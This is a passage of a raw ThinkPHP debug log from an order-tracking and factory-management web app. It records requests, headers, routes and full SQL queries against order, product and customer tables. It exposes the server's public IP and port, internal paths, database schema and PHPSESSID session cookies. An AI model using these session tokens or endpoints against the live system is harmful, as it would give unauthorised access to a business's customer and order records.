`orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308066>orderinfo.end_time desc,1658308066>orderinfo.end_time desc,1658308066-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002367s ] --------------------------------------------------------------- [ 2022-07-20T17:07:46+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018677s][吞吐率:53.54req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001077s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:46+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=1&pageNum=10 [运行时间:0.053349s][吞吐率:18.74req/s] [内存消耗:4,769.86kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001086s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001804s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000580s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001702s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000606s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001603s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001429s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308066>orderinfo.end_time desc,1658308066>orderinfo.end_time desc,1658308066-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002325s ] --------------------------------------------------------------- [ 2022-07-20T17:07:47+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020602s][吞吐率:48.54req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:47+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/hedui/ids/1759?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1759?dialog=1 [运行时间:0.079461s][吞吐率:12.58req/s] [内存消耗:6,627.45kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001086s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '1759', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001628s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000407s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001287s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000378s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001056s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001107s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001604s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000388s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001442s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001265s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001315s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001094s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001022s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1759' [ RunTime:0.002940s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1238 LIMIT 1 [ RunTime:0.000535s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1072 LIMIT 1 [ RunTime:0.000287s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1126 LIMIT 1 [ RunTime:0.000240s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1129 LIMIT 1 [ RunTime:0.000209s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1266 LIMIT 1 [ RunTime:0.000226s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1078 LIMIT 1 [ RunTime:0.000453s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1040 LIMIT 1 [ RunTime:0.000236s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1045 LIMIT 1 [ RunTime:0.000409s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 1759 LIMIT 1 [ RunTime:0.000298s ] --------------------------------------------------------------- [ 2022-07-20T17:07:47+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022285s][吞吐率:44.87req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001289s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:47+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1658308067 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1658308067 [运行时间:0.031300s][吞吐率:31.95req/s] [内存消耗:3,849.99kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001133s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1759?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1658308067', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001616s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:47+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020937s][吞吐率:47.76req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:48+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019093s][吞吐率:52.38req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001221s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:48+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019417s][吞吐率:51.50req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001225s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:48+08:00 ] 106.112.205.110 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.049316s][吞吐率:20.28req/s] [内存消耗:5,009.16kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001166s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1759?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '152', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '152', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001613s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.005926s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000420s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001463s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (152) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000344s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (152) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000289s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001164s 